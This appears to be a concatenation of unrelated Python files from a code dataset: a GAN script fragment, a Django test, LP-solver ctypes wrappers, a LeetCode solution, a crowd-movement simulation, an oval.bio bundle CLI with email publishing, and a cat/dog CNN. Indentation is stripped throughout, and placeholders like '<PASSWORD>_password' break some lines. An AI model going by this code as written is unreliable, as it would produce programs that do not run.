cnt = 0
for i in range(int(m / 16)):
for j in range(16):
ax[i][j].set_xticks([])
ax[i][j].set_yticks([])
ax[i][j].imshow(batch_copy[cnt], cmap="gray",
interpolation="nearest", vmin=0, vmax=1)
if titles is not None:
ax[i][j].set_title(titles[cnt], fontsize=20)
cnt += 1
print(f"Saving {path}")
plt.savefig(path)
plt.close(fig)
def main(args):
if args.seed >= 0:
tn.seeder.random_seed(args.seed)
if args.train:
train(args)
if args.evaluate:
evaluate(args)
if __name__ == "__main__":
curr_dir = os.path.dirname(os.path.abspath(__file__))
parser = argparse.ArgumentParser()
parser.add_argument("--data_dir", type=str,
default=os.path.join(curr_dir, "data"))
parser.add_argument("--model_type", default="mlp", type=str,
help="cnn or mlp")
parser.add_argument("--output_dir", type=str,
default=os.path.join(curr_dir, "samples"))
parser.add_argument("--seed", type=int, default=-1)
parser.add_argument("--model_name", type=str, default="generator.pkl")
parser.add_argument("--train", action="store_true")
parser.add_argument("--evaluate", action="store_true")
parser.add_argument("--batch_size", type=int, default=128)
parser.add_argument("--num_ep", default=50, type=int)
parser.add_argument("--lr_g", default=7.5e-4, type=float)
parser.add_argument("--lr_d", default=2e-4, type=float)
parser.add_argument("--beta1", default=0.5, type=float)
parser.add_argument("--nz", default=50, type=int,
help="dimension of latent z vector")
main(parser.parse_args())
| StarcoderdataPython |
1733390 | <gh_stars>0
from django.test import SimpleTestCase
from django.urls import reverse, resolve
from profiles.views import profile
class TestUserUrls(SimpleTestCase):
def test_profile_url(self):
url = reverse("profile")
self.assertEquals(resolve(url).func, profile)
| StarcoderdataPython |
3271377 | # Copyright (c) 2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ctypes
import numpy
import sys
from ctypes import CFUNCTYPE, POINTER, c_double, c_int, c_int32, c_void_p, c_size_t
from numpy.ctypeslib import ndpointer
from .common import SubSolver
from ..model import walk_shape
from ..reparametrization import Reparametrization
class LPSolver(SubSolver):
def get_repametrization(self):
raise NotImplementedError
class TRWS(LPSolver):
DEFAULT_PARAMETERS = {
'max_iterations': 2000,
'threads': 1,
}
def __init__(self, model, parameters=None):
super().__init__(model, parameters)
self._init_library()
self.model = model
self._energy = self._energy_create(model.number_of_variables, model.shape,
sum(1 for x in model.factors if x.number_of_variables > 1))
edge_counter = 0
for i, factor in enumerate(model.factors):
if factor.number_of_variables == 1:
self._energy_add_unary(self._energy, factor.variables[0], factor.data)
elif factor.number_of_variables == 2:
self._energy_add_pairwise(self._energy, edge_counter, *factor.variables, factor.data)
edge_counter += 1
else:
raise RuntimeError('Unsupported factor arity.')
self._energy_finalize(self._energy)
self._solver = self._solver_create(self._energy)
def __del__(self):
if self._energy:
self._energy_destroy(self._energy)
self._energy = None
if self._solver:
self._solver_destroy(self._solver)
self._solver = None
def _init_library(self):
self._lib = ctypes.cdll.LoadLibrary('libcombilp_trws_stub.so')
self._energy_create = self._lib.combilp_trws_stub_energy_create
self._energy_create.argtypes = [c_int32, ndpointer(dtype=c_int32), c_int32]
self._energy_create.restype = c_void_p
self._energy_add_unary = self._lib.combilp_trws_stub_energy_add_unary
self._energy_add_unary.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_double)]
self._energy_add_pairwise = self._lib.combilp_trws_stub_energy_add_pairwise
self._energy_add_pairwise.argtypes = [c_void_p, c_int32, c_int32, c_int32, ndpointer(dtype=c_double)]
self._energy_finalize = self._lib.combilp_trws_stub_energy_finalize
self._energy_finalize.argtypes = [c_void_p]
self._energy_destroy = self._lib.combilp_trws_stub_energy_destroy
self._energy_destroy.argtypes = [c_void_p]
self._solver_create = self._lib.combilp_trws_stub_solver_create
self._solver_create.argtypes = [c_void_p]
self._solver_create.restype = c_void_p
self._solve = self._lib.combilp_trws_stub_solve
self._solve.argtypes = [c_void_p, c_int, c_int]
self._solver_destroy = self._lib.combilp_trws_stub_destroy_solver
self._solver_destroy.argtypes = [c_void_p]
self._get_backward_messages = self._lib.combilp_trws_stub_get_backward_messages
self._get_backward_messages.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_double)]
def solve(self):
self._solve(self._solver,
self.parameters['max_iterations'],
self.parameters['threads'])
def get_repametrization(self):
repa = Reparametrization(self.model)
edge_counter = 0
for i, factor in enumerate(self.model.factors):
if factor.number_of_variables == 2:
self._get_backward_messages(self._solver, edge_counter,
repa.get_factor(i, 0))
edge_counter += 1
# recompute forward messages
values = repa.get_factor_value(i)
repa_values = repa.get_factor(i, 1)
for label in range(factor.shape[1]):
minimum = values[:,label].min()
repa_values[label] = minimum
return repa
class SRMP(LPSolver):
DEFAULT_PARAMETERS = {
'max_iterations': 2000,
}
def __init__(self, model, parameters=None):
super().__init__(model, parameters)
self._init_library()
self._solver = self._create(self.model.number_of_variables, self.model.shape)
for factor in self.model.factors:
assert(factor.data.flags.c_contiguous)
self._add_factor(self._solver, factor.number_of_variables,
factor.variables, factor.data)
def __del__(self):
if self._solver:
self._destroy(self._solver)
self._solver = None
def _init_library(self):
self._lib = ctypes.cdll.LoadLibrary('libcombilp_srmp_stub.so')
self._message_func_type = CFUNCTYPE(None, c_size_t, POINTER(c_int32), c_int32, POINTER(c_double), POINTER(c_double))
self._message_func_type.from_param = self._message_func_type
self._create = self._lib.combilp_srmp_stub_create
self._create.argtypes = [c_int32, ndpointer(dtype=c_int32)]
self._create.restype = c_void_p
self._destroy = self._lib.combilp_srmp_stub_destroy
self._destroy.argtypes = [c_void_p]
self._add_factor = self._lib.combilp_srmp_stub_add_factor
self._add_factor.argtypes = [c_void_p, c_int32, ndpointer(dtype=c_int32), ndpointer(dtype=c_double)]
self._solve = self._lib.combilp_srmp_stub_solve
self._solve.argtypes = [c_void_p, c_int]
self._extract_messages = self._lib.combilp_srmp_stub_extract_messages
self._extract_messages.argtypes = [c_void_p, self._message_func_type]
def solve(self):
self._solve(self._solver, self.parameters['max_iterations'])
def get_repametrization(self):
result = Reparametrization(self.model)
# The edge_iterator of SRMP returns factors *exactly* in our own factor
# order which is *awesome*. :)
current_factor = 0
def find_factor(variables):
nonlocal current_factor
for factor_index in range(current_factor, len(self.model.factors)):
factor = self.model.factors[factor_index]
if numpy.array_equal(factor.variables, variables):
return factor_index, factor
current_factor = factor_index
def func(alphas_size, alphas, beta, message, message_end):
alphas = [alphas[i] for i in range(alphas_size)]
factor_index, factor = find_factor(alphas)
local_variable_index = alphas.index(beta)
r = result.get_factor(factor_index, local_variable_index)
r[:] = message[:r.size]
self._extract_messages(self._solver, func)
return result
| StarcoderdataPython |
1760357 | #
# 1533. Find the Index of the Large Integer
#
# Q: https://leetcode.com/problems/find-the-index-of-the-large-integer/
# A: https://leetcode.com/problems/find-the-index-of-the-large-integer/discuss/765851/Javascript-Python3-C%2B%2B-binary-search-one-xor-two-%22middles%22
#
class Solution:
def getIndex(self, reader: 'ArrayReader') -> int:
N = reader.length()
i = 0
j = N - 1
p = 0 # 💎 p is the pivot
while i <= j:
k = (i + j) // 2
if (j - i) % 2:
p = reader.compareSub(i, k, k + 1, j) # ⭐️ even subarray has two non-overlapping "middles": k, k + 1
else:
p = reader.compareSub(i, k, k, j) # ⭐️ odd subarray has a single overlapping "middle": k
if not p: return k # 🎯 found ✅
if p < 0: i = k + 1 # 🔍 search 👉
if 0 < p: j = k # 🔍 search 👈
return -1 # 🎯 not found 🚫 (invalid use case)
| StarcoderdataPython |
126510 | '''
Created on Nov 29, 2020
@author: manik
'''
import numpy as np
import src.person_properties_util as idx
class Movement():
"""
Class providing abstraction into each movement of the population
"""
def update_persons(self, persons: np.ndarray, size: int,
speed: float = 0.1,
heading_update_chance: float = 0.02) -> np.ndarray:
"""
Randomly updates/initializes the destination each person is headed to
and corresponding speed randomly.
Parameters
----------
person : np.ndarray
The NumPy array containing the details of the persons to be
updated.
size : int
The size of the array of the persons to be updated to.
speed : float, optional
Mean of the speed to be generated randomly, by default 0.1.
heading_update_chance : float, optional
The odds of updating the destination of each person, by default
0.02.
Returns
-------
np.ndarray
The upated NumPy array with updated values
"""
# For updating the x position
# Generate a random array with update chance for each person in
# the population
update = np.random.random(size=(size,))
# Get the persons in the population who have a lower or equal to
# chance of getting updated in this epoch
shp = update[update <= heading_update_chance].shape
# Update the position for the direction in which they are heading
persons[:, idx.x_dir][update <= heading_update_chance] = np.random \
.normal(loc=0, scale=1/3, size=shp)
# For updating the y position, do the same
update = np.random.random(size=(size,))
shp = update[update <= heading_update_chance].shape
persons[:, idx.y_dir][update <= heading_update_chance] = np.random \
.normal(loc=0, scale=1/3, size=shp)
# Update the speed by generating a random normal distribution using
# the argument speed as the parameter
update = np.random.random(size=(size,))
shp = update[update <= heading_update_chance].shape
persons[:, idx.speed][update <= heading_update_chance] = np.random \
.normal(loc=speed, scale=speed / 3, size=shp)
persons[:, idx.speed] = np.clip(persons[:, idx.speed], a_min=0.0005,
a_max=0.01)
# Return the updated array
return persons
def out_of_bounds(self, persons: np.ndarray, xbounds: list,
ybounds: list) -> np.ndarray:
"""
Check if the individual is heading out of bounds of the specified
bounds.
Parameters
----------
person : np.ndarray
The NumPy array containing the details of the individuals
xbounds : list
List containing bounds for X axis.
ybounds : list
List containing bounds for Y axis.
Returns
-------
np.ndarray
The upated NumPy array with updated values
"""
# Store shape of list of people who are heading out of bounds based
# on X bound [0]
shp = persons[:, 4][(persons[:, 2] <= xbounds[:, 0]) &
(persons[:, 4] < 0)].shape
# Update them randomly using a normal distribution
persons[:, 4][(persons[:, 2] <= xbounds[:, 0]) &
(persons[:, 4] < 0)] = \
np.clip(np.random.normal(loc=0.5, scale=0.5/3, size=shp),
a_min=0.05, a_max=1)
# Store shape of list of people who are heading out of bounds based
# on X bound [1]
shp = persons[:, 4][(persons[:, 2] >= xbounds[:, 1]) &
(persons[:, 4] > 0)].shape
# Update them randomly using a normal distribution
persons[:, 4][(persons[:, 2] >= xbounds[:, 1]) &
(persons[:, 4] > 0)] = \
np.clip(-np.random.normal(loc=0.5, scale=0.5/3, size=shp),
a_min=-1, a_max=-0.05)
# Store shape of list of people who are heading out of bounds based
# on Y bound [0]
shp = persons[:, 5][(persons[:, 3] <= ybounds[:, 0]) &
(persons[:, 5] < 0)].shape
# Update them randomly using a normal distribution
persons[:, 5][(persons[:, 3] <= ybounds[:, 0]) &
(persons[:, 5] < 0)] = \
np.clip(np.random.normal(loc=0.5, scale=0.5/3, size=shp),
a_min=0.05, a_max=1)
# Store shape of list of people who are heading out of bounds based
# on Y bound [1]
shp = persons[:, 5][(persons[:, 3] >= ybounds[:, 1]) &
(persons[:, 5] > 0)].shape
# Update them randomly using a normal distribution
persons[:, 5][(persons[:, 3] >= ybounds[:, 1]) &
(persons[:, 5] > 0)] = \
np.clip(-np.random.normal(loc=0.5, scale=0.5/3, size=shp),
a_min=-1, a_max=-0.05)
return persons
def update_pop(self, persons: np.ndarray):
"""
Update function to move people physically in the graph.
This function adds the X and Y direction value to the current postion
of the individual to move them.
Parameters
----------
person : np.ndarray
The NumPy array containing the details of the persons to be updated
Returns
-------
np.ndarray
The upated NumPy array with updated values
"""
filter = (persons[:, idx.current_state] != 3) & \
(persons[:, idx.social_distance] == 0)
# x
persons[:, 2][filter] = persons[:, 2][filter] + \
(persons[:, 4][filter] * persons[:, 6][filter])
# y
persons[:, 3][filter] = persons[:, 3][filter] + \
(persons[:, 5][filter] * persons[:, 6][filter])
return persons
| StarcoderdataPython |
3292198 | <reponame>sjennewein/MetaDataDistiller<gh_stars>0
import re
import urllib.parse
import glob
import os
import time
from metadata import data
import json
import requests
import zipfile
import sys
from metadata import payload
def touch(fname):
with open(fname, 'a'):
os.utime(fname, None)
input = sys.argv[1]
output = sys.argv[2]
input = os.path.expanduser(input)
output = os.path.expanduser(output)
touch(output + 'missed.log')
try:
os.makedirs(output)
except:
pass
with open(input) as f:
content = f.readlines()
content = [x.strip() for x in content]
total_time = time.time()
for doi in content:
start_time = time.time()
fail = None
try:
metadata = data.extract(doi)
except Exception as err:
fail = err
metadata = {}
registrar = doi.split('/')[0]
try:
os.stat(output + registrar)
except:
os.mkdir(output + registrar)
if not metadata:
with open(output + 'missed.log', 'a') as f:
f.write(doi + '\n')
with open(output + 'error.log', 'a') as f:
f.write(str(fail) + '\n')
continue
with open(output + doi, 'w') as json_file:
if type(metadata) is dict:
#print('crossref')
out = json.dumps(metadata)
elif isinstance(metadata,payload.Payload):
#print('scraping')
out = payload.PayloadEncoder().encode(metadata)
json_file.write(out)
# print("--- %s seconds ---" % (time.time() - start_time))
# print("--- TOTAL: %s seconds ---" % (time.time() - total_time))
| StarcoderdataPython |
1688689 | import csv
import logging
import math
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
import click
import oval.core
import pandas as pd
from tabulate import tabulate
logger = logging.getLogger(__name__)
@click.group(context_settings={"help_option_names": ['-h', '--help']})
@click.option(
"--log", envvar="OVAL_LOG", default="-",
help="Log file. Use '-' for stdout.")
@click.option(
"--log-level", default="WARNING",
help="Log output level.")
@click.option(
'--profiling/--no-profiling', default=False,
help="Print performance profiling info on exit.")
@click.option(
"--bundle", default="session.zip",
help="oval.bio session data bundle file.")
@click.pass_context
def root(context, log, log_level, profiling, bundle):
"""
oval.bio session bundle utilities.
"""
class Obj:
pass
context.obj = obj = Obj()
obj.log = log
obj.log_level = log_level
obj.profiling = profiling
obj.bundle = bundle
level = getattr(logging, obj.log_level.upper())
oval.core.setup_logging(obj.log, level)
logger.debug("bundle: {}".format(bundle))
@root.command()
@click.option(
'--pattern', '-p', default='test*.py',
help="test files to match")
@click.pass_obj
def test(obj, pattern):
"""
Run test suite.
"""
with oval.core.cli_context(obj):
loader = unittest.TestLoader()
suite = loader.discover(
os.path.abspath(os.path.dirname(__file__)),
pattern=pattern)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
@root.command()
@click.pass_obj
def flake8(obj):
"""
Run flake8.
"""
try:
subprocess.check_call([sys.executable, '-m', 'flake8'])
print("flake8 OK")
except subprocess.CalledProcessError as e:
if e.returncode == 1:
print("\nThere were flake8 errors!")
@root.command()
@click.pass_obj
def version(obj):
"""
Print version.
"""
import oval
print(oval.__version__)
@root.command()
@click.pass_obj
def create(obj):
"""
Create empty oval bundle.
"""
with oval.core.cli_context(obj) as bundle:
bundle.create()
@root.command()
@click.pass_obj
def info(obj):
"""
Print bundle metadata.
"""
with oval.core.cli_context(obj) as bundle:
metadata = bundle.read_attributes()
num_charts = len(metadata["chart_data"])
del metadata["chart_data"]
metadata["num_charts"] = num_charts
print(tabulate(metadata.items()))
@root.command()
@click.pass_obj
@click.option(
'--key', '-k', multiple=True, help="Key corresponding to value argument")
@click.option(
'--value', '-v', multiple=True, help="Value corresponding to key argument")
def set(obj, key, value):
"""
Set bundle metadata attributes.
"""
with oval.core.cli_context(obj) as bundle:
bundle.update_metadata(dict(zip(key, value)))
@root.command()
@click.pass_obj
@click.argument('filename')
def set_text(obj, filename):
"""
Set bundle text that shows up on published reports. Copies the file
specified into the bundle and points metadata to it.
"""
arcname = os.path.basename(filename)
with oval.core.edit_archive(obj.bundle) as arc_dir:
shutil.copy2(filename, os.path.join(arc_dir, arcname))
with oval.core.cli_context(obj) as bundle:
bundle.write_attribute("text", arcname)
@root.command()
@click.pass_obj
@click.option(
'--filename', '-f', help="File containing html to use for the bundle.")
def set_html(obj, filename):
"""
Set bundle html that shows up on published reports.
"""
arcname = os.path.basename(filename)
with oval.core.edit_archive(obj.bundle) as arc_dir:
shutil.copy2(filename, os.path.join(arc_dir, arcname))
with oval.core.cli_context(obj) as bundle:
bundle.write_attribute("html", arcname)
@root.command()
@click.pass_obj
@click.argument('args', nargs=-1)
def remove(obj, args):
"""
Remove the specified metadata attributes.
"""
with oval.core.cli_context(obj) as bundle:
bundle.remove_attributes(args)
@root.command()
@click.pass_obj
def list(obj):
"""
List chart data in the bundle.
"""
with oval.core.cli_context(obj) as bundle:
print(tabulate(enumerate(bundle.list_charts())))
@root.command()
@click.pass_obj
@click.option(
'--filename', '-f', help="chart data filename")
@click.option(
'--remove-zero/--no-remove-zero',
'-r', help="Don't add rows with zero value in y_column", default=False)
@click.option(
'--stroke', '-s', multiple=True,
help="brush stroke to use for chart line", default=["steelblue"])
@click.option(
'--stroke-width', '-w', multiple=True,
help="brush stroke to use for chart line", default=[1.5])
@click.argument('x_column')
@click.argument('y_column', nargs=-1)
def add_chart(
obj, filename, remove_zero, stroke, stroke_width, x_column, y_column):
"""
Add chart data to the bundle. If multiple y_columns are specified,
then multiple charts will be added.
"""
with oval.core.cli_context(obj) as bundle:
for i, y_col in enumerate(y_column):
if i < len(stroke):
st = stroke[i]
else:
st = stroke[-1]
if i < len(stroke_width):
st_w = stroke_width[i]
else:
st_w = stroke_width[-1]
chart_kwargs = {
"remove_zero": remove_zero,
"x_column": x_column,
"y_column": y_col,
"stroke": st,
"stroke_width": st_w}
bundle.add_chart(filename, **chart_kwargs)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('args', nargs=-1)
def edit_chart(obj, index, args):
"""
Edit chart at index INDEX to include the specified key/value pairs, where
key value pairs are alternating arguments, e.g. KEY VALUE KEY VALUE...
"""
with oval.core.cli_context(obj) as bundle:
key = args[::2]
value = args[1::2]
chart_kwargs = dict(zip(key, value))
bundle.edit_chart(int(index), **chart_kwargs)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('filename')
def copy_chart(obj, index, filename):
"""
Copy chart at INDEX to FILENAME with TITLE.
"""
with oval.core.cli_context(obj) as bundle:
bundle.copy_chart(int(index), filename)
@root.command()
@click.pass_obj
@click.argument('index')
@click.argument('column', nargs=-1)
@click.option(
'--range-min', '-i', help="Range minimum", default=0)
@click.option(
'--range-max', '-j', help="Range maximum", default=1)
@click.option(
'--relative/--no-relative', '-r',
help="Set range min/max such that the value space starts at zero",
default=False)
def rescale_chart_data(
obj, index, column, range_min, range_max, relative):
"""
Rescales the COLUMNs of chart INDEX to be between
RANGE_MIN and RANGE_MAX. Using the relative flag
forces min to be zero and max to be the column max/min
difference.
"""
with oval.core.cli_context(obj) as bundle:
if relative:
metadata = bundle._get_metadata()
with bundle.edit_archive() as arc_dir:
chart_data_filename = metadata[
"chart_data"][int(index)]["filename"]
fn = os.path.join(arc_dir, chart_data_filename)
df = pd.read_csv(fn)
for col in column:
col_min, col_max = df[col].min(), df[col].max()
logger.debug(
"relative rescaling: {} {}".format(col_min, col_max))
bundle.rescale_chart_data(
int(index), *[col],
feature_range=(
type(col_min)(0.0), col_max - col_min))
else:
bundle.rescale_chart_data(
int(index), *column, feature_range=(range_min, range_max))
@root.command()
@click.pass_obj
@click.argument('index')
def chart_data_columns(obj, index):
"""
Return chart data column names.
"""
with oval.core.cli_context(obj) as bundle:
print(tabulate(enumerate(bundle.chart_data_columns(int(index)))))
@root.command()
@click.pass_obj
@click.option(
'--title', '-t', help="Chart title")
@click.option(
'--start-time', '-s', default=1.0, help="Signal start time")
@click.option(
'--end-time', '-e', default=11.0, help="Signal end time")
@click.option(
'--num-samples', '-n', default=1000, help="How many rows to generate")
@click.option(
'--amplitude', '-a', default=0.5, help="Signal amplitude")
@click.option(
'--frequency', '-f', default=4, help="Signal frequency")
@click.option(
'--phase', '-p', default=0.0, help="Signal phase")
@click.option(
'--y-offset', '-y', default=0.0, help="Signal phase")
@click.option(
'--x-label', '-i', default="Time (s)", help="x axis chart label")
@click.option(
'--y-label', '-j', default="Sample", help="y axis chart label")
def gen_chart(
obj, title, start_time, end_time,
num_samples, amplitude, frequency, phase, y_offset,
x_label, y_label):
"""
Generate sinusoidal chart data for testing.
"""
with oval.core.cli_context(obj) as bundle:
with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as f:
temp_filename = f.name
with open(temp_filename, 'w', newline='') as csvfile:
inst_writer = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)
inst_writer.writerow(['time', 'sample'])
sample_time = start_time
inc = (end_time - start_time)/num_samples
while sample_time < end_time:
yt = amplitude * math.sin(
2*math.pi * frequency * sample_time + phase) + y_offset
inst_writer.writerow([sample_time, yt])
sample_time += inc
if title is None:
title = os.path.basename(temp_filename)
bundle.add_chart(
temp_filename, title=title,
x_label=x_label, y_label=y_label)
os.remove(temp_filename)
@root.command()
@click.pass_obj
@click.argument('args', nargs=-1)
def remove_chart(obj, args):
"""
Remove chart data from the bundle by indices.
"""
with oval.core.cli_context(obj) as bundle:
bundle.remove_charts([int(i) for i in args])
@root.command()
@click.pass_obj
@click.argument('idx', nargs=1)
def chart_info(obj, idx):
"""
Print chart information.
"""
with oval.core.cli_context(obj) as bundle:
print(tabulate(bundle.get_chart(int(idx)).items()))
@root.command()
@click.pass_obj
@click.option(
'--from-addr', '-f', help="From email address.")
@click.option(
'--to-addr', '-t', help="To email address.")
@click.option(
'--smtp-host', '-s', help="SMTP host")
@click.option(
'--smtp-port', '-p', help="SMTP port")
@click.option(
'--smtp-user', '-u', help="SMTP user")
@click.option(
'--smtp-password', '-p', help="SMTP password")
@click.option(
'--title', '-t', help="Post title", default=None)
def publish(
obj, from_addr, to_addr, smtp_host, smtp_port,
smtp_user, smtp_password, title):
"""
Publish the bundle by email.
"""
with oval.core.cli_context(obj) as bundle:
metadata = bundle.read_attributes()
text = ""
html = None
uuid_str = None
if "text" in metadata:
text = bundle.read_file(metadata["text"]).decode()
if "html" in metadata:
html = bundle.read_file(metadata["html"]).decode()
if "uuid" in metadata:
uuid_str = metadata["uuid"]
else:
logger.warning("missing metadata uuid")
uuid_str = str(uuid.uuid1())
if title is None:
title = uuid_str
kwargs = {
"smtp_host": smtp_host,
"smtp_port": int(smtp_port),
"smtp_user": smtp_user,
"smtp_password": <PASSWORD>_password}
if html is not None:
kwargs["html_body"] = html
files = [(obj.bundle, os.path.basename(obj.bundle), None)]
logger.info("Publishing '{}' to {}".format(title, to_addr))
oval.core.send_email(
from_addr, to_addr, title, text, files=files, **kwargs)
| StarcoderdataPython |
55277 | import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
from tensorflow.python.keras.callbacks import TensorBoard
from tqdm import tqdm
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
import random
import pickle
import logging
import logging.config
import sys
import time
LOGGING = {
'version': 1,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'stream': sys.stdout,
}
},
'root': {
'handlers': ['console'],
'level': 'INFO'
}
}
logging.config.dictConfig(LOGGING)
DATADIR = "/home/pedro/Área de Trabalho/PetImages"
CATEGORIES = ["Cachorro", "Gato"]
training_data = []
IMG_SIZE = 50
def prepare(filepath):
img_array = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # read in the image, convert to grayscale
new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing
return new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# def loadData():
#
# for category in CATEGORIES: # do dogs and cats
# path = os.path.join(DATADIR, category) # create path to dogs and cats
#
# for img in os.listdir(path): # iterate over each image per dogs and cats
#
# img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array
# plt.imshow(img_array, cmap='gray') # graph it
# plt.show() # display!
#
# break # we just want one for now so break
# break #...and one more!
# def create_training_data():
# for category in CATEGORIES: # do dogs and cats
#
# path = os.path.join(DATADIR, category) # create path to dogs and cats
# class_num = CATEGORIES.index(category) # get the classification (0 or a 1). 0=dog 1=cat
#
# for img in tqdm(os.listdir(path)): # iterate over each image per dogs and cats
# try:
# img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) # convert to array
# new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize to normalize data size
# training_data.append([new_array, class_num]) # add this to our training_data
# except Exception as e:
# pass
#except OSError as e:
# print("OSErrroBad img most likely", e, os.path.join(path,img))
#except Exception as e:
# print("general exception", e, os.path.join(path,img))
# def main():
# loadData()
# create_training_data()
# print(len(training_data))
# shuffle_train_and_save()
# train3()
#open_model_64x3()
#
#
# def shuffle_train_and_save():
# random.shuffle(training_data)
# for sample in training_data[:10]:
# print(sample[1])
#
# X = []
# y = []
# for features, label in training_data:
# X.append(features)
# y.append(label)
#
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
#
# pickle_out = open("X.pickle", "wb")
# pickle.dump(X, pickle_out)
# pickle_out.close()
#
# pickle_out = open("y.pickle", "wb")
# pickle.dump(y, pickle_out)
# pickle_out.close()
def open_data():
pickle_in = open("X.pickle", "rb")
X = pickle.load(pickle_in)
pickle_in = open("y.pickle", "rb")
y = pickle.load(pickle_in)
X = X/255.0
return X, y
#
# def model(X, y):
#
# model = Sequential()
#
# model.add(Conv2D(256, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Conv2D(256, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
#
# model.add(Dense(64))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'])
#
# model.fit(X, y, batch_size=32, epochs=3, validation_split=0.3)
#
#
# def train():
#
# NAME = "Cats-vs-dogs-64x2-CNN"
# X,y = open_data()
# model = Sequential()
#
# model.add(Conv2D(64, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Conv2D(64, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
# model.add(Dense(64))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
#
# def train2():
#
# X,y = open_data()
#
# dense_layers = [0, 1, 2]
# layer_sizes = [32, 64, 128]
# conv_layers = [1, 2, 3]
#
# for dense_layer in dense_layers:
# for layer_size in layer_sizes:
# for conv_layer in conv_layers:
# import time
# NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
# print(NAME)
#
# model = Sequential()
#
# model.add(Conv2D(layer_size, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# for l in range(conv_layer-1):
# model.add(Conv2D(layer_size, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten())
#
# for _ in range(dense_layer):
# model.add(Dense(layer_size))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
#
# def train3():
#
# X, y = open_data()
#
# dense_layers = [0]
# layer_sizes = [64]
# conv_layers = [3]
#
# for dense_layer in dense_layers:
# for layer_size in layer_sizes:
# for conv_layer in conv_layers:
# import time
# NAME = "{}-conv-{}-nodes-{}-dense-{}".format(conv_layer, layer_size, dense_layer, int(time.time()))
# print(NAME)
#
# model = Sequential()
#
# model.add(Conv2D(layer_size, (3, 3), input_shape=X.shape[1:]))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# for l in range(conv_layer-1):
# model.add(Conv2D(layer_size, (3, 3)))
# model.add(Activation('relu'))
# model.add(MaxPooling2D(pool_size=(2, 2)))
#
# model.add(Flatten())
#
# for _ in range(dense_layer):
# model.add(Dense(layer_size))
# model.add(Activation('relu'))
#
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
#
# tensorboard = TensorBoard(log_dir="logs/{}".format(NAME))
#
# model.compile(loss='binary_crossentropy',
# optimizer='adam',
# metrics=['accuracy'],
# )
#
# model.fit(X, y,
# batch_size=32,
# epochs=10,
# validation_split=0.3,
# callbacks=[tensorboard])
#
# model.save('64x3-CNN.model')
#
def open_model_64x3(path):
model = tf.keras.models.load_model("source/core/machine/64x3-CNN.model")
prediction = model.predict([prepare(path)])
logging.info(time.time())
logging.info(CATEGORIES[int(prediction[0][0])])
return CATEGORIES[int(prediction[0][0])]
| StarcoderdataPython |
181412 | <reponame>johnche/troll-simulator
import numpy as np
